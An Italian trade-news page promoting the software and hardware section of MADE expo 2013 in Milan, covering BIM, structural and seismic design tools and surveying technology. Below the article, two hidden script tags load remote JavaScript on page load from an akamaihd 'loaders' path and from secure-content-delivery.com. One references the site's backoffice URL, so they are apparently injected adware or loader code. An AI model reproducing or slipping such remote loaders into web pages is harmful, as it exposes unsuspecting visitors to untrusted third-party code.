1. Home
  2. Notizie e Mercato
  3. Made Software and Hardware

Made Software and Hardware

Software edilizia di
5/5
votato da 1 persone
A MADE expo 2013 le migliori tecnologie software e dispositivi informatici per progettare e costruire con Made Software e Hardware


MADE SOFTWARE E HARDWARE è il Salone di MADE expo che recepisce le migliori tecnologie per la progettazionearchitettonica sostenibile, rendering, grafica e design.

Inoltre saranno presentate le più attuali soluzioni e tecnologie di software per la progettazione strutturale, il calcolo e la simulazione dell’azione sismica.
Oggi tutto il processo edilizio richiede un continuo aggiornamento e supporto all’attività professionale portato da software sempre più performanti e specializzati, non solo per i progettisti, ma per tutti i tecnici che seguono le fasi di tipo produttivo, della progettazione esecutiva e di cantiere, ai programmi più sofisticati e complessi di Project Management, Diagnostica, Misura, Collaudo.

MADE expo offre una panoramica ampia ed esaustiva attraverso la presenza delle aziende più avanzate. Telerilevamento, sistemi laser e gps, cartografia e topografia completano l’offerta.
Anche l’adozione del BIM troverà svariate iniziative a MADE expo 2013 per comprendere ed adottare sempre più questo innovativo sistema di controllo per ogni sviluppo immobiliare. In particolare FTC - Forum Tecnologie Costruzioni presenterà quanto di più innovativo in questo campo e le soluzioni più avanzate per l’ingegneria.

Svariati sono i campi di applicazione di queste tecnologie all’interno della filiera edile e delle costruzioni dove la pluralità delle professioni coinvolte costituiscono un ambito di assoluto interesse per le aziende e per l’offerta integrata.

A MADE expo a Milano Rho dal 2 al 5 ottobre 2013.


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>